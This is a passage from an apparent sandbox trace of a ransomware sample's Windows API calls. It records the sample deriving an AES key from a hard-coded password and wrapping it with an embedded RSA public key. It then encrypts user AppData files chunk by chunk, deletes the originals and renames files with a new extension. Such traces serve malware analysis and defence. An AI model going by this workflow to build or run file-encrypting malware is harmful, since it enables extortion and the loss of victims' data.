hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.313] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.313] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.313] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.313] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.313] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.313] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.313] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.314] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.314] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.314] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x280, lpOverlapped=0x0) returned 1 [0266.314] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x280, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x290) returned 1 [0266.314] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x290, lpOverlapped=0x0) returned 1 [0266.314] CloseHandle (hObject=0x5d3c) returned 1 [0266.314] CloseHandle (hObject=0x5d48) returned 1 [0266.314] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), bFailIfExists=0) returned 1 [0266.316] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms", dwFileAttributes=0x0) returned 1 [0266.317] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms.gsg")) returned 1 [0266.318] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms.fuck")) returned 1 [0266.319] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0266.319] CryptDestroyKey (hKey=0x2e7ec80) returned 1 [0266.319] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0266.319] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.319] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7eb80 [0266.320] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0266.320] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0266.320] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0266.320] GetLastError () returned 0x0 [0266.320] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\Internet Explorer Suggested Sites~.feed-ms" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\internet explorer suggested sites~.feed-ms")) returned 0x2020 [0266.320] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\Internet Explorer Suggested Sites~.feed-ms", dwFileAttributes=0x80) returned 1 [0266.320] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\Internet Explorer Suggested Sites~.feed-ms" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\internet explorer suggested sites~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0266.321] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\Internet Explorer Suggested Sites~.feed-ms.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\internet explorer suggested sites~.feed-ms.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0266.323] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\Internet Explorer Suggested Sites~.feed-ms.gsg", dwFileAttributes=0x2) returned 1 [0266.323] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2e7a500) returned 1 [0266.325] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0266.325] lstrlenA (lpString="PvMwiXwJkKzPixDiGqwlDZbNzMlQm") returned 29 [0266.325] CryptHashData (hHash=0x2e7ec80, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0266.325] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7ec80, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2e7f440) returned 1 [0266.325] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0266.325] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0266.325] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2e78058) returned 1 [0266.325] CryptImportPublicKeyInfo (in: hCryptProv=0x2e78058, dwCertEncodingType=0x1, pInfo=0x2eb15f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb1620*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb1628*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2e7f740) returned 1 [0266.325] CryptEncrypt (in: hKey=0x2e7f740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0266.325] CryptEncrypt (in: hKey=0x2e7f740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e781f0*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2e781f0*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0266.325] WriteFile (in: hFile=0x5d44, lpBuffer=0x2e781f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2e781f0*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0266.326] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.394] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.394] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.396] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.396] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.396] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.396] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.396] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.396] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.396] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.396] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.396] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.396] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.461] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.461] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.462] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.462] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.462] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.462] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.462] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.462] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.462] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.462] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.462] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.462] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.462] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.462] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.462] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.462] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.462] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.463] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.463] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.463] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.463] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.463] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.463] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.463] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.463] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.463] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.463] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.463] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.463] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.463] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.463] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.463] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.463] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.464] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.464] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.464] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.464] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.464] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.464] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.464] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.464] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.464] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.464] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.464] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.464] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.464] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.464] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 